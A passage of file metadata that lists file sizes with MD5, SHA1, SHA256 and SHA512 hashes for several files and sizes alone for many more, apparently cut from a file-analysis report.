SHA512450101acf9a4a39990d0cb0863794c0852fdf14f37a577af520fe7793b4ed70b5dd07a74f9fec42d9f762b4f45140eca75442b0ce76585a2c2646af64ffc4d21
-
Filesize
71KB
MD583142242e97b8953c386f988aa694e4a
SHA1833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10
-
Filesize
2.1MB
MD557973391c12eacafdc04647b27b2f439
SHA14d0c9b6bfd8819fdf83fc042e0d2d363c9ac47be
SHA2564a68f65ec41bd361d2f54fc9d8152a2e6c584296be0eaf302078a2b0cbc881d6
SHA512878278ef05b8c3f4ff7fc1dfebe3ae00b329f3d9463805b8b69c1cfa41927b24b9297ba999b637d2c1e80f5277a43d5249b276e31e510a81c6aa96555f208e4c
-
Filesize
183KB
MD5109cab5505f5e065b63d01361467a83b
SHA14ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc
-
Filesize
1.4MB
MD568f080515fa8925d53e16820ce5c9488
SHA1ff5a1cc48e0dcfed469e6a5e8a07cb643f58170a
SHA256038f72a66df8456befeacc89394c29f74e1ea043812f66191fd9f0c28b035975
SHA512f44cb0650668cfd1e1c71c968837fef42a0a07cb694cf4a7ff2cc5bdbaece319f625ae558c5ddd1990fd34ecf2cecda1f6a77687499b62c91cf9ebb2e2188a67
-
Filesize
22KB
MD592dc6ef532fbb4a5c3201469a5b5eb63
SHA13e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA2569884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA5129908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3
-
Filesize
2.1MB
MD585f03b4f782d4a5ed2db22248a914670
SHA1354b13d3a1379a190bb1b4c87cfb45897f2ed5b2
SHA25606a0c5ec948b65d8377b784b32f0beed36585a0c800b7ef378ed4d2bc6619f66
SHA512756d4ad7f6e5908e0068838773b2b43ba6cb855bc1ecf1c6cc399a3d349dc9eab67d2e07b212031bdf21cb3d10181f8e427e45a2d658dcab08ea9d98980476fe
-
Filesize
136KB
MD516e5a492c9c6ae34c59683be9c51fa31
SHA197031b41f5c56f371c28ae0d62a2df7d585adaba
SHA25635c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66
SHA51220fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6
-
Filesize
1.8MB
MD54b3d6041b7fe0ec4f9a9d9d4a15becd5
SHA17bd1aa4602463ff713c72b522a536d2e3d3470ab
SHA2563f37caf3f24d9f536b6827e5099d0aebc79378084856d39ccb61b10dccff05d0
SHA5125fbcbe3bfafdf3cfb551056c5c31992ba1695de816b4df30d8fea420b647eca7ff1df93f50f349e6237f181482863d8fc3c4819654d8509d302b44e8527e5946
-
Filesize
136KB
-
Filesize
1.4MB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
136KB
-
Filesize
8.9MB
-
Filesize
452KB
-
Filesize
452KB
-
Filesize
136KB
-
Filesize
452KB
-
Filesize
452KB
-
Filesize
136KB
-
Filesize
136KB
-
Filesize
208KB
-
Filesize
136KB
-
Filesize
13.9MB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
13.9MB
-
Filesize
4.8MB
-
Filesize
13.9MB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
8.9MB
-
Filesize
8.9MB
-
Filesize
8.9MB
-
Filesize
13.9MB
-
Filesize
208KB
-
Filesize
184KB
-
Filesize
184KB
-
Filesize
184KB
-
Filesize
184KB
-
Filesize
136KB
-
Filesize
5.9MB
-
Filesize
184KB
-
Filesize
184KB
-
Filesize
184KB
-
Filesize
184KB
-
Filesize
184KB
-
Filesize
184KB
-
Filesize
184KB
-
Filesize
184KB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
1.4MB